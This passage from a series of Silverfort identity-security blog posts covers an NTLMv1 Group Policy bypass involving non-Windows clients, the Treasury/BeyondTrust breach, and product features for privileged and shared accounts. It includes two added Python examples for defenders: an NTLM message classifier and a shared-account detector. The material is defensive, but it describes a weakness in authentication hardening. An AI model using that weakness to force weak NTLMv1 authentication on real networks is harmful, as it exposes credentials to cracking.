So how does this impact the elimination of NTLMv1? Applications that request clients to generate NTLMv1 will still be able to do so, even if the Group Policy is activated.
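Because the Domain Controller can be talked into accepting NTLMv1 regardless of Group Policy, the reliable place to see what version an application actually asks clients for is the Authenticate message itself. The structural difference described in the NTLMv1 vs NTLMv2 section is exactly what a defender can key on: an NTLMv1 NtChallengeResponse is a fixed 24-byte DES-based value, while an NTLMv2 response is a 16-byte HMAC followed by a client challenge and the AV_PAIRS. The following is an added example, not Silverfort’s code, that classifies a captured NTLM AUTHENTICATE_MESSAGE by that rule using the field layout from MS-NLMP, and pulls out the account and (for NTLMv2) the AV_PAIRS so the target service can be recorded. The two sample messages are constructed with dummy response bytes and made-up names, not real captures.

```python
"""Classify a captured NTLM AUTHENTICATE_MESSAGE as NTLMv1 or NTLMv2.

Added example; not Silverfort's code. Field layout follows MS-NLMP
(AUTHENTICATE_MESSAGE, NTLMv2_RESPONSE, AV_PAIR). The sample messages are
constructed with dummy response bytes and made-up names, not real captures.
"""
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
AUTHENTICATE_MESSAGE = 3
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001

# AV_PAIR identifiers (MS-NLMP AvId values)
AV_IDS = {
    0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
    6: "MsvAvFlags", 7: "MsvAvTimestamp", 8: "MsvAvSingleHost",
    9: "MsvAvTargetName", 10: "MsvChannelBindings",
}
STRING_AV_IDS = {1, 2, 3, 4, 5, 9}   # UTF-16LE valued pairs


def _field(msg, off):
    """Decode a Len/MaxLen/BufferOffset descriptor and return the bytes it points to."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, off)
    return msg[offset:offset + length]


def _parse_av_pairs(blob):
    """Walk AvId/AvLen/Value triples until MsvAvEOL."""
    pairs, pos = {}, 0
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:
            break
        value = blob[pos:pos + av_len]
        pos += av_len
        name = AV_IDS.get(av_id, f"MsvAvUnknown{av_id}")
        pairs[name] = value.decode("utf-16-le") if av_id in STRING_AV_IDS else value.hex()
    return pairs


def classify_ntlm_authenticate(msg):
    """Return version, account names and (for NTLMv2) the AV_PAIRS of one message."""
    if msg[:8] != NTLMSSP_SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != AUTHENTICATE_MESSAGE:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    nt_response = _field(msg, 20)                 # NtChallengeResponseFields
    flags = struct.unpack_from("<I", msg, 60)[0]  # NegotiateFlags
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "latin-1"
    info = {
        "domain": _field(msg, 28).decode(enc),
        "user": _field(msg, 36).decode(enc),
        "workstation": _field(msg, 44).decode(enc),
        "av_pairs": {},
    }
    # NTLMv1 (with or without extended session security) sends a fixed 24-byte
    # DES-based response. NTLMv2 sends a 16-byte HMAC-MD5 followed by an
    # NTLMv2_CLIENT_CHALLENGE whose RespType and HiRespType bytes are both 1.
    if len(nt_response) == 24:
        info["version"] = "NTLMv1"
    elif len(nt_response) > 44 and nt_response[16:18] == b"\x01\x01":
        info["version"] = "NTLMv2"
        # AV_PAIRS follow the 28-byte client-challenge header (reserved, timestamp, challenge)
        info["av_pairs"] = _parse_av_pairs(nt_response[44:])
    else:
        info["version"] = "unknown"
    return info


# Constructed samples (dummy response bytes; not real traffic)

def build_authenticate(nt_response, user, domain, workstation):
    """Lay out a minimal Unicode AUTHENTICATE_MESSAGE without Version or MIC fields."""
    fields = [b"\x00" * 24, nt_response, domain.encode("utf-16-le"),
              user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]
    header = bytearray(NTLMSSP_SIGNATURE + struct.pack("<I", AUTHENTICATE_MESSAGE))
    payload = b""
    for data in fields:                      # payload starts right after the 64-byte header
        header += struct.pack("<HHI", len(data), len(data), 64 + len(payload))
        payload += data
    header += struct.pack("<I", NTLMSSP_NEGOTIATE_UNICODE)
    return bytes(header) + payload


def build_ntlmv2_response(av_pairs):
    """Dummy 16-byte response plus an NTLMv2_CLIENT_CHALLENGE carrying the given AV_PAIRS."""
    blob = b"\x01\x01" + b"\x00" * 6 + b"\x00" * 8 + b"\x11" * 8 + b"\x00" * 4
    for av_id, text in av_pairs:
        value = text.encode("utf-16-le")
        blob += struct.pack("<HH", av_id, len(value)) + value
    blob += struct.pack("<HH", 0, 0) + b"\x00" * 4
    return b"\xaa" * 16 + blob


SAMPLE_V1 = build_authenticate(b"\xab" * 24, "alice", "CORP", "MAC-FINANCE-07")
SAMPLE_V2 = build_authenticate(
    build_ntlmv2_response([(2, "CORP"), (9, "cifs/fs01.corp.example")]),
    "alice", "CORP", "WS01")

if __name__ == "__main__":
    for sample in (SAMPLE_V1, SAMPLE_V2):
        print(classify_ntlm_authenticate(sample))
```

A message flagged NTLMv1 from a non-Windows workstation is the case the text describes: a client that honours the application’s request even though Windows clients at LMCompatibilityLevel 3 and above would refuse it. Both plain NTLMv1 and NTLMv1 with extended session security produce the 24-byte response, so the classifier treats them alike; only an NTLMv2 response carries the AV_PAIRS that name the destination server and SPN.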
It is important to note that Windows clients with LMCompatibilityLevel 3 and above will not generate NTLMv1 if requested. However, non-Windows clients are not protected. If an application requests an NTLMv1 message from a non-Windows client, the Domain Controller may approve the authentication and generate a session key. We see applications in our customer networks that attempt to use NTLMv1 even if the relevant Group Policy is activated. Because of this bypass, you cannot tell whether a vulnerable application is fully mitigated. While many organizations attempt to discover all NTLMv1 use, they may not even be aware that some applications are still using NTLMv1.

#### What should I do to fully mitigate?

- Enable audit logs for all NTLM authentications in the domain.
- Map all applications that use NTLM authentication, either as their first choice or as a fallback.
- Detect vulnerable applications that request that clients use NTLMv1 messages.
- Fence all NTLM with a modern authentication method.

Silverfort’s Unified Identity Security Platform detects and protects all NTLM authentications. Our ITDR module can detect NTLMv1 applications and apply risk-based modern fencing to all vulnerable applications.

### Disclosure Process

While MSRC indicated that the NTLMv1 bypass was not classified as a vulnerability, they took proactive measures by announcing the complete removal of NTLMv1 starting with Windows 11 version 24H2 and Windows Server 2025. The issue was reported on September 30th, 2024, and their response aligned with the official removal announcement in November 2024. By addressing legacy risks and phasing out outdated protocols, Microsoft demonstrates a strong commitment to enhancing security with a forward-thinking approach. This step underscores the importance of safeguarding systems with modern, secure alternatives like SSO or Kerberos and showcases how responsible reporting can contribute to meaningful improvements.

### Want to learn more?
Watch our on-demand webinar

If you want to dive into the detail around this research, check out this on-demand webinar, where I walked through how to mitigate NTLMv1 authentications in the absence of a patch.

---
- Published: 2025-01-13
- Modified: 2025-02-26
- URL: https://www.silverfort.com/blog/the-treasury-department-cyberattack-key-insights-on-beyondtrust-remote-support-software-hack/

### TL;DR

- The U.S. Department of the Treasury was targeted in December 2024 by a cyberattack attributed to a Chinese state-sponsored Advanced Persistent Threat (APT) group.
- Hackers exploited command injection vulnerabilities (CVE-2024-12356 and CVE-2024-12686) in third-party vendor BeyondTrust’s remote support software.
- Attackers gained unauthorized remote access to Treasury workstations, retrieving unclassified documents.
- BeyondTrust’s software served as the entry point, but Treasury systems were the focus.
- Just like endpoint and cloud, you need to protect your identity infrastructure. Augment your identity security and prevent incidents like this with risk-based access management and enhanced privileged access security.

***

In December 2024, the U.S. Department of the Treasury fell victim to a sophisticated cyberattack orchestrated by a Chinese state-sponsored APT group. These groups are known for targeting government entities, critical infrastructure and private sector organizations to steal intellectual property and conduct espionage.

### Entry point: Vulnerable remote support software

The attackers exploited two command injection vulnerabilities (CVE-2024-12356 and CVE-2024-12686) in BeyondTrust’s remote support software. This software is commonly used for remote access and IT support, making it a high-value target. The attackers used the vulnerabilities to bypass authentication, execute unauthorized commands and gain control over connected systems.
Using a stolen API key, the hackers accessed Treasury workstations, retrieved unclassified documents and potentially probed other parts of the network.

### Tactics point to Chinese state-sponsored APT group

The attack has been attributed to an unnamed Chinese state-sponsored APT group, though China denies involvement. Chinese APT groups have a history of:

- exploiting software vulnerabilities for persistent access
- conducting espionage campaigns against government and defense sectors
- targeting intellectual property from industries like technology and energy.

This breach aligns with previous tactics employed by Chinese state-sponsored APT groups to exploit third-party vulnerabilities and leverage them for broader network infiltration.

### Impact and lessons learned

The breach was limited to unclassified Treasury systems, with no evidence of classified data exposure. However, it underscores the importance of reducing your identity attack surface with a defense-in-depth strategy that layers proven security controls over third-party software; for example, MFA or automated privileged access security. This will help you address vulnerabilities swiftly while also placing multiple lines of defense around your privileged access and identities. If you are assessing your vulnerability to this attack and the APT group’s known tactics, here are a few things you can do:

- Transition to risk-based access management and enhanced privileged access security (PAS).
- Add a PAS layer to your PAM (Privileged Access Management) practice from different vendors.
- Conduct regular vulnerability assessments, and always patch vulnerabilities and fix requirements in third-party software quickly.
- Implement zero-trust architecture and MFA.
- Continuously monitor for threats and anomalies around privileged identities; in other words, make sure your SOC or MDR increases the sensitivity level around privileged identities and has all the data and controls to rapidly stop takeovers.
This incident serves as a critical reminder of the risks posed by supply chain vulnerabilities and the need for proactive cybersecurity measures. Request a demo to discover how to augment your identity security and prevent incidents like this.

---
- Published: 2025-01-08
- Modified: 2025-03-05
- URL: https://www.silverfort.com/blog/introducing-the-silverfort-integration-hub-a-new-era-for-hybrid-and-cloud-identity-security/

Silverfort is excited to announce the launch of our Integration Hub, a Silverfort cloud service that seamlessly connects your Silverfort deployment—whether on-premise, in the cloud, or hybrid—with third-party systems. The Integration Hub empowers organizations to stay ahead of Identity Security risks by enabling real-time communication and automation between Silverfort and a wide range of external tools. With the Integration Hub, administrators can be instantly alerted to threats in real-time and take swift action, all while ensuring that their security ecosystem operates cohesively.

The Integration Hub is designed to provide a flexible, scalable, and future-ready solution for building a more integrated security stack. Whether you want to enhance identity protection or improve coordination across your security tools, the Silverfort Integration Hub simplifies complex integrations and empowers organizations to take a proactive approach to Identity Security.

### Key Capabilities of the Silverfort Integration Hub

#### Real-Time Notifications

The Integration Hub allows Silverfort to connect with notification systems, ensuring administrators receive instant alerts about any threats detected by Silverfort. Now, security practitioners can consume Identity Security alerts in the systems they are already using, enabling faster and more effective responses to critical security events.
#### XDR and EDR Risk Integration

The Integration Hub will expand in 2025 to support integration with Extended Detection and Response (XDR) and Endpoint Detection and Response (EDR) platforms. This will enable bi-directional communication, allowing Silverfort to both ingest third-party risk data and share identity-based threat insights. This real-time collaboration will enhance an organization’s ability to prevent lateral movement and contain threats across the network and endpoints.

#### Shared Signals Framework (SSF) for Seamless Communication

Also set for release in 2025, the Shared Signals Framework (SSF) will allow Silverfort to exchange security signals with other platforms in real-time. By adopting this open standard, Silverfort ensures streamlined, consistent communication between systems, making it easier to share and act on security events like compromised accounts, compliance violations, or suspicious authentication attempts.

### Expanding Integration Beyond Notifications and XDR

The Silverfort Integration Hub builds on existing integrations, such as with Splunk and Microsoft Sentinel in the SIEM space. While Silverfort already provides powerful identity-based insights to these platforms, the Integration Hub opens the potential for even more advanced use cases. It will allow deeper integrations, enabling more robust two-way communication, closed-loop workflows, and expanded capabilities across various security systems.

Beyond SIEM, the Integration Hub is designed to connect with a variety of security tools to ensure seamless communication across your security stack:

#### Identity and Access Management (IAM) Providers

Bi-directional integration with IAM systems allows Silverfort to receive risk signals and respond by enforcing identity-specific policies, such as blocking suspicious sessions or enforcing multi-factor authentication (MFA). This ensures continuous monitoring and real-time response to identity-related threats across the enterprise.
#### Identity Governance and Administration (IGA) Systems

Silverfort’s unique position as a layer on top of identity providers like Active Directory, Entra ID, Okta, and many more gives the Silverfort platform privileged insights into how identities are being used to access applications. These insights allow Silverfort to provide IGA systems with real-time data, helping them make better, more informed decisions during access reviews. By integrating Silverfort’s continuous visibility and identity activity monitoring, IGA solutions can ensure access rights align with identity behavior and risk profiles.

#### Security Orchestration, Automation, and Response (SOAR) Systems

Silverfort can integrate with SOAR platforms to automate incident response workflows. Silverfort can trigger automated actions when a threat is detected, such as isolating compromised accounts or enforcing additional security layers, reducing the time and effort required to respond to incidents.

#### Incident Response Systems

Silverfort feeds identity-related intelligence into incident management processes by connecting to incident response platforms. This integration allows teams to quickly isolate compromised accounts, prevent further unauthorized access, and reduce the overall impact of security incidents.

### Unlocking New Possibilities with the Integration Hub

The Silverfort Integration Hub is available now, and all customers need to do to unlock this powerful feature is upgrade to Silverfort version 5.1.2. Once upgraded, Silverfort will be able to release new integrations without requiring customers to update their platform version, making it easier to access future integrations and new features. Check out the Ecosystem Documentation to stay up to date with the available integrations. If your organization has specific systems or vendors you would like Silverfort to work with, please email us at ecosystem@silverfort.com.
Your feedback helps us continually expand our network of technology partners and our integration capabilities.

---
- Published: 2024-12-11
- Modified: 2025-02-26
- URL: https://www.silverfort.com/blog/secure-your-privileged-accounts-with-silverfort/

Due to the distinct security blind spots associated with PAM solutions, protecting privileged accounts has become a daunting task for most organizations. These blind spots include lengthy deployment cycles and manual account discovery that delays the identification of privileged accounts. At the same time, gaps in enforcing least privilege access and in preventing admins from bypassing security controls leave organizations vulnerable to compromise.

Simply managing privileged accounts is not sufficient—without implementing concrete security controls for these accounts, the sheer volume of access pathways, users, and entitlements can quickly spiral out of control. In order to truly control which users should be granted access to the organization's crown jewels, we must rethink how privileged access is secured to ensure that it does not become a gateway for attackers.

In this post, we will show the different capabilities you can gain from Silverfort’s newly launched Privileged Access Security (PAS) module. We will explain how Silverfort enables you to secure your privileged accounts easily through automated discovery and classification, fencing, and enforcing least privilege and Just-In-Time (JIT) access policies for all your privileged users.

### The Privileged Access Blind Spots 101

The traditional approach to managing privileged accounts with PAM solutions focuses on controlling and monitoring who has access, but it does not take into account the significant limitations that leave these accounts exposed. The limitations of PAM solutions create blind spots in an organization's identity security posture, making it easier for attackers to navigate across an organization's environment without being noticed.
What are the limitations of traditional PAM solutions that organizations need to overcome?

- Slow and Complex Onboarding: According to Osterman Research, only 10% of organizations successfully complete their PAM projects, often due to the time and resources required to onboard all systems and accounts. This incomplete coverage leaves many privileged accounts unmanaged and vulnerable to compromise, creating gaps attackers can easily target.
- Discovery Gaps: Traditional PAM tools struggle to identify all privileged accounts, users, and the systems they access. These unknown or unmonitored accounts become hidden entry points for attackers, who exploit them to escalate privileges and move laterally across environments.
- Bypassing PAM: Administrators often get around PAM by directly checking out credentials or accessing servers without using PAM workflows. This undermines the protections PAM provides, leaving a trail of unmonitored activity that attackers can replicate or exploit to avoid detection.
- Privileged Access Abuse: Misuse of privileged accounts, such as using elevated access for non-critical tasks, expands the attack surface. When these accounts are overused or used improperly, it increases the risk of compromise and makes it harder to detect malicious activity amid legitimate actions.

These blind spots weaken traditional PAM solutions, making it easier for attackers to bypass controls and compromise critical systems. Organizations need to deploy a more proactive approach that goes beyond managing their privileged accounts and instead emphasizes security above all.

### Silverfort’s Privileged Access Security (PAS)

Silverfort offers a new approach to overcoming the limitations of traditional PAM solutions through its unique architecture, which integrates directly with Active Directory.

Silverfort automatically discovers and classifies all privileged accounts based on user activity.
This enables organizations to gain comprehensive visibility into all privileged accounts, cross-tier authentications, and access requests to identify whether regular accounts are being used with privileged intent.

With Silverfort's PAS, organizations can implement Just-in-Time (JIT) access policies to ensure that privileged accounts only receive the necessary permissions when needed and for a limited duration. Implementing these controls allows organizations to improve their security posture while achieving zero standing privileges at scale.

Silverfort uses a three-step approach to secure privileged accounts:

- Discover and classify all your privileged accounts.
- Fence privileged accounts to their intended purpose.
- Enforce frictionless Just-in-Time (JIT) access policies at scale.

### Automated Discovery and Classification

The first step to properly securing all privileged accounts is understanding exactly who your privileged users are and what they are accessing. Here are several key questions to consider:

- What privileged accounts do you have?
- How many privileged accounts do you have?
- Which assets or systems are these accounts accessing?

These questions are answered when you deploy Silverfort’s PAS. The discovery and classification step is initiated when an organization connects its domain controllers to Silverfort. This allows Silverfort to automatically discover, identify, and classify all privileged accounts based on the actual user activity and authentications. Organizations gain comprehensive visibility into all privileged accounts and their access requests to critical resources to identify whether these accounts are being used with privileged intent.

Silverfort also classifies different privileged user tiers based on their actual activity and helps organizations prioritize and implement tailored security controls for each tier.
By monitoring account behavior, Silverfort detects and alerts on risky cross-tier access attempts, enabling organizations to proactively address privilege escalation threats.

### Fence Privileged Accounts to Their Intended Purpose

Once full visibility and insight into all privileged accounts is achieved, the next phase is to configure a virtual fence for these accounts to ensure they are used for their intended purposes.

Silverfort’s fencing capabilities provide organizations with strong security control over privileged accounts by restricting their access to the specific resources that require high privileges, while any unnecessary or unauthorized access to other resources is automatically blocked.

To further reduce risk, Silverfort limits the use of privileged accounts to predefined sources, destinations and protocols, thereby reducing the possibility of misuse and lateral movement. By detecting and preventing privilege escalation and cross-tier access attempts, Silverfort ensures strict role segmentation is applied and protects against unauthorized activities.

What sets Silverfort apart is its ability to automatically recommend tailored least privilege policies based on real account usage patterns. These policies specify exactly where and how privileged accounts should be used, and the approved access rules for each account. This automation not only simplifies implementation but also significantly reduces the attack surface, ensuring privileged accounts are only used within their intended parameters.

### Seamless Just-In-Time Access

Configuring and applying time-sensitive Just-In-Time access policies is the final step in completely securing all your privileged users.

Using Silverfort's JIT capabilities, organizations can render accounts completely unusable until access is explicitly required. This approach significantly reduces the attack surface and ensures that privileged accounts remain secure when not actively in use.
Through the removal of unnecessary standing privileges, Silverfort minimizes overexposure and enforces strict access controls.

JIT policies are easy to create in the Silverfort console under the PAS screen, where you can simply design frictionless access policies for each user and assign the duration of their access. Admins may select the type of authentication and, if MFA is selected, which MFA token needs to be activated.

Implementing JIT policies with Silverfort reduces the need for outdated and complex security controls, such as password rotation and vaulting, which are often time-consuming and difficult to implement. As a result, access rights are granted dynamically and only when necessary, aligning security with efficiency.

### Learn More About Silverfort’s Privileged Access Security

With Silverfort's newly launched Privileged Access Security (PAS) module, all privileged users are secured with real-time security controls. By automating the discovery and classification of privileged accounts, enforcing least privilege principles and enabling Just-In-Time (JIT) access policies, Silverfort empowers you to secure privileged access with unprecedented ease and efficiency.

Looking to learn how you can change the way you secure privileged access? Please join us for our PAS webinar with The Hacker News or reach out to one of our experts here.

---
- Published: 2024-12-09
- Modified: 2025-02-26
- URL: https://www.silverfort.com/blog/silverfort-launches-privileged-access-security-to-solve-gaps-left-by-pam/

Today we’re proud to introduce another important milestone in Silverfort’s journey to build the world’s leading unified identity security platform. The same paradigm shift we’ve previously applied to MFA, Non-Human Identity (NHI) protection, ITDR and more is now applied to address one of the most critical challenges of identity security – securing privileged access with our new Privileged Access Security (PAS) product.
### It’s time to rethink the security of privileged access.

Entering 2025, it’s easy to see that identity security has become top of mind for organizations’ security leaders. In light of the evolving identity threat landscape, in which credential compromise for malicious access is a pillar of almost every attack, leaders are compelled to reevaluate the traditional identity security methods that are no longer efficient enough – and PAM solutions are high on the list.

### Why the current ways to protect privileged users are not enough.

Every hands-on identity security practitioner would be the first to agree that relying exclusively on the traditional PAM approach to guard administrative access is bound to leave security gaps. Endless onboarding cycles, challenges in discovering all privileged accounts, and frequent bypasses by admins are some of the prominent issues organizations struggle with. The result is that PAM protection is rarely applied to all privileged accounts, and too many are left temporarily or even permanently exposed.

### Envision a privileged access security solution that overcomes the gaps of traditional PAM.

Our task when attempting to tackle this important challenge was to build a solution that addresses the following needs: from the operational aspect, rapid deployment and onboarding, covering all privileged accounts; from the security aspect, the ability to enforce secure access for all privileged users, with Least Privilege and Just-In-Time (JIT) access policies.

To achieve these goals, we had to zoom out of how PAM solutions have been built so far (which is still based on architecture designed decades ago) and look for an alternate approach. One might say that our aim wasn’t to build a better PAM, but to fundamentally rethink how the objectives that PAM solutions aim for can be better achieved in an alternative manner.

### Silverfort Privileged Access Security (PAS): Go beyond protecting privileged accounts. Secure them.
At the core of Silverfort lies the innovative technology and architecture in which our platform integrates with the different pieces of the IAM infrastructure, becoming an inline component of the authentication and authorization process. This enables us to see, monitor, and enforce identity security controls in real time on 100% of the access requests that take place within the various identity providers (IdPs) in the environment. So, we’ve turned our efforts to using these capabilities for the purpose of protecting privileged access:

- Rapid deployment and onboarding: If Silverfort is already in place, no additional installation is required, and the Privileged Access Security capabilities can be enabled immediately. If not, Silverfort can be deployed in most organizations in a matter of hours or days (unlike traditional PAM solutions, which take months or even years to deploy and onboard).
- Automated discovery: Silverfort already sees every authentication and access attempt, as well as the configuration of the IAM infrastructure. As such, it can not only identify the users that are members of the admin groups, but – more importantly – identify the users that access sensitive resources, practically exercising admin access without being officially defined as such. Silverfort can also identify all the sources and destinations in which a privileged account is being used.
- Enforcement of Least Privilege access, with “Virtual Fencing”: Silverfort can interject in any authentication process and inform the identity provider whether to allow access or block it. This allows organizations to ensure that privileged accounts are used only within their intended purpose, and that no one can abuse them for any other access.
- Just-In-Time (JIT) access: We’ve enhanced our technology with the ability to disable any administrative account, and only enable it for a short period of time when it’s actually needed, upon a verified access request by an authorized user.
- Admin bypass resiliency: The admin’s user experience when accessing resources stays intact and is not subject to any change. Silverfort’s security controls are enforced inline through its integration with the IAM infrastructure (e.g., Active Directory), regardless of how the admin tries to access the resource. In practice, it means that no admin can bypass the protection of Silverfort by accessing resources “directly,” as they (and threat actors) often do with traditional PAM solutions.

### Reshaping the future of identity security.

The launch of PAS is another important step in Silverfort’s mission to deliver a single solution that addresses the full scope of identity security needs. What’s more important than the specific capabilities is that PAS operates with our existing modules – ISPM, ITDR, MFA, Service Account (NHI) protection, and Authentication Firewall – to form a whole that is far greater than the sum of its parts. For the first time, security teams can get a turnkey solution to address identity threats end-to-end, in which the ability to protect administrative access plays a key role.

### Join us in redefining what’s possible.

Learn more about Silverfort Privileged Access Security here.

---
- Published: 2024-11-26
- Modified: 2025-02-26
- URL: https://www.silverfort.com/blog/how-fido2-enhances-identity-security-for-shift-based-shared-accounts-in-retail-and-manufacturing/

In industries that require a shift-based workforce, like retail and manufacturing, sharing user accounts is a common solution for employees who need quick access to critical systems, especially during fast-paced handovers between shifts. However, the use of shared accounts in an organization's environment should be a warning sign for the security team.
From cash registers and point-of-sale (POS) systems in retail chains to operational technology (OT) systems in manufacturing plants, shared accounts expose organizations to severe security risks that can result in data breaches and leakage of sensitive data. In this blog, we highlight the unique security challenges that organizations with shop-floor and factory-floor workforces face with shared accounts, and then show how Silverfort’s native integration with FIDO2 tokens adds a layer of security while giving employees a seamless login to critical systems.

Why Shared Accounts Are a Security Weak Spot for Shift-Based Workforces

Shared accounts in shift-based organizations create complex challenges, primarily because they require credential sharing. Employees routinely pass credentials around, especially in fast-paced retail and manufacturing environments where personal accounts are not practical. This makes it impossible to attribute activity to an individual user, and it makes exposed passwords, misuse, and eventual credential compromise all but certain. Without individual accountability, organizations are exposed to insider theft and supply chain attacks.

In addition, shared accounts are consistently one of the weakest points of an identity security posture. Once compromised, they allow attackers to move laterally across the environment or escalate privileges with minimal detection. Unauthorized entry into a retail POS system or a manufacturing OT system can lead to operational disruptions, system malfunctions, or costly downtime. Without strict access control policies, ensuring that only authorized users have legitimate access to these systems is a significant challenge.
How Silverfort Secures Shared Accounts with FIDO2 MFA Integration

Silverfort’s native FIDO2 multi-factor authentication (MFA) lets organizations that use FIDO2 keys apply an extra layer of security to user accounts and critical systems. With Silverfort’s FIDO2 integration, organizations can require token-based authentication on shared accounts so that only authorized team members can reach critical systems. Adding MFA to the authentication process reduces the risk of credential compromise and unauthorized access.

In addition, Silverfort provides complete visibility into shared accounts and records every access attempt, making it possible to monitor individual activity within a shared environment. With Silverfort’s real-time monitoring, organizations gain a comprehensive log of all authentication activity, making it easier to detect potential threats and to ensure that shared account access is secure and fully auditable. Let’s see how Silverfort helps shift-based industries create secure spaces within their shared environments.

Visibility Into Shared Accounts

Silverfort identifies shared accounts automatically and provides real-time visibility into all user activity. With Silverfort, you can detect and respond to malicious activity much faster, including blocking access for any account that displays suspicious behavior. Silverfort’s Insights page gives actionable information about all protected domains (users and resources) and a high-level view of your organization’s security posture. In the Users & Passwords section, you can see all shared accounts in your environment. These accounts are detected by analyzing access attempts that arrive from multiple devices and servers at the same time, which flags them as likely shared by separate human users.
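The “used from several devices at the same time” heuristic described above, written out as a small detector over authentication events. This is an added example and not Silverfort’s code: the event layout, the five-minute sliding window, the two-source threshold and the sample accounts and hosts are all constructed assumptions for illustration.

```python
"""Flag accounts that look shared: the same account authenticating from
several distinct source devices within a short window.

Added example, not Silverfort code. Event format, window and thresholds
are assumptions chosen for illustration.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events (timestamp, account, source device, target).
# Loosely modelled on Windows 4624 logon records; not real data.
SAMPLE_EVENTS = [
    ("2024-11-20T06:58:10", "pos-store17", "REG-01",  "POS-SRV"),
    ("2024-11-20T06:59:40", "pos-store17", "REG-04",  "POS-SRV"),
    ("2024-11-20T07:01:05", "pos-store17", "REG-02",  "POS-SRV"),
    ("2024-11-20T07:02:30", "pos-store17", "REG-01",  "INVENTORY"),
    ("2024-11-20T07:15:00", "j.doe",       "LT-JDOE", "FILESRV"),
    ("2024-11-20T07:16:00", "j.doe",       "LT-JDOE", "MAILSRV"),
    ("2024-11-20T12:00:00", "j.doe",       "KIOSK-3", "FILESRV"),   # hours later: not concurrent
    ("2024-11-20T14:00:00", "oper-line2",  "HMI-A",   "SCADA-HIST"),
    ("2024-11-20T14:01:30", "oper-line2",  "HMI-B",   "SCADA-HIST"),
]


def parse(events):
    """Turn raw tuples into (datetime, account, source, target), oldest first."""
    return sorted((datetime.fromisoformat(ts), user, src, dst)
                  for ts, user, src, dst in events)


def find_shared_account_candidates(events, window=timedelta(minutes=5), min_sources=2):
    """Return {account: sorted distinct sources} for every account that
    authenticated from at least min_sources different devices inside one
    sliding window of length `window`. The largest such source set wins."""
    by_user = defaultdict(list)
    for ts, user, src, _dst in parse(events):
        by_user[user].append((ts, src))

    candidates = {}
    for user, rows in by_user.items():
        recent = deque()        # events inside the current window
        best = set()
        for ts, src in rows:
            recent.append((ts, src))
            while recent and ts - recent[0][0] > window:   # drop events that aged out
                recent.popleft()
            sources = {s for _, s in recent}
            if len(sources) >= min_sources and len(sources) > len(best):
                best = sources
        if best:
            candidates[user] = sorted(best)
    return candidates


if __name__ == "__main__":
    for account, sources in find_shared_account_candidates(SAMPLE_EVENTS).items():
        print(f"{account}: concurrent use from {', '.join(sources)}")
```

Two things a practitioner should keep in mind when running this against real logon data: a single person roaming between two workstations, or using a laptop and a phone, will also trip a concurrency check, so the output is a candidate list for review rather than a verdict; and the window should be tuned to the actual handover pattern on the floor, since a very short window misses staggered shift changes while a long one over-flags ordinary users.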
Screenshot #1: Discovering the number of shared accounts in the Insights screen

Clicking the Shared Accounts icon opens a pop-up with the full details. With the names of these shared accounts, you can export them for later in-depth analysis or investigate them one by one and enforce policies on them, including deleting them or applying deny-access policies.

Screenshot #2: Displaying the complete list of shared accounts

Creating an MFA Policy for Shared Account Protection

To prevent unauthorized use of a shared account, we recommend creating a dedicated policy that triggers MFA whenever a user requests access with it. This adds a further layer of protection to your critical resources, since shared accounts often accumulate broad permissions because they are used in many different contexts.

Screenshot #3: MFA access policy for additional identity verification of shared accounts

Open Silverfort’s Policies screen and click “Create a new policy”. Choose your IdP in the Auth Type section and tick the relevant authentication protocol (Kerberos/NTLM or LDAP(S)). Select Static-based as the Policy Type, and in the Users and Groups section choose the specific shared account whose access you want to control. Choose MFA as the Action and then select FIDO2 token among the available methods.

Screenshot #4: MFA access policy advanced options for additional policy restrictions

In the Advanced Options section you can also set Policy Restrictions, which determine whether the policy applies always or only during specific times or days. In the MFA Frequency section, choose how often MFA requests are sent to the user (Require MFA), counted from the previous MFA attempt (From) and scoped to the user, device or resource for which the previous MFA was performed (According To).
Once this policy is in place, it triggers MFA during the authentication process for the chosen shared accounts. Even if the shared account’s password has been compromised, the policy still requires the FIDO2 token as an additional factor, prompting the legitimate user to approve the access request.

Using FIDO2 Tokens in Silverfort Authentication Policies

Silverfort supports any FIDO2 token for approving MFA requests for protected users, including shared accounts. When a user attempts to access a protected resource, an MFA request is sent to the user’s machine and the user is prompted to insert their FIDO2 key to verify their identity and approve the request.

Enabling Real-Time Protection for Securing Shared Accounts in Shift-Based Industries

With shared accounts a common security risk in shift-based environments, applying FIDO2 tokens can significantly strengthen the controls across users and resources. By gaining visibility into every access attempt and applying strict authentication policies, Silverfort enables organizations to minimize the risk of unauthorized access and credential misuse, keeping critical systems protected even with high-turnover, shift-based workforces.

Looking to enforce advanced identity security controls across your environments? Schedule a call with one of our experts.

---
- Published: 2024-11-22
- Modified: 2025-02-07
- URL: https://www.silverfort.com/blog/enhancing-cyber-security-with-silverfort-addressing-key-insights-from-the-asd-acsc-annual-cyber-threat-report-2023-2024/

Over the past year, the Australian Cyber Security Centre (ACSC) received nearly 90,000 cybercrime reports and more than 36,700 calls to its Cyber Security Hotline, according to its 2024 Annual Cyber Threat Report. On average, that is one cybercrime report every six minutes and 100 calls each day.
The biggest cyber incident affecting critical infrastructure in Australia involved compromised credentials, while credential theft was the most common cybercrime reported by individuals. In this article, we examine the report’s key points on identity security and how Silverfort aligns with them.

The ASD ACSC Annual Cyber Threat Report 2023-2024 provides critical insights into the current cybersecurity landscape, highlighting the ongoing challenges faced by organizations across sectors. Here are the key areas where Silverfort can help:

1. Incident Categorization and Response

The report categorizes cybersecurity incidents on a scale from Category 1 (C1), the most severe, to Category 6 (C6), the least severe. Incidents categorized as C3 or above involve significant organizations such as federal and state governments, large enterprises, academia, and supply chains. Silverfort’s platform provides comprehensive protection for these critical entities by:

- Monitoring and analyzing authentication and access attempts across all resources.
- Detecting and preventing unauthorized access in real time.
- Enforcing adaptive multi-factor authentication (MFA) based on risk assessment, with a strong recommendation for phishing-resistant MFA methods such as FIDO2 and passkeys.

2. Compromised Accounts and Credentials

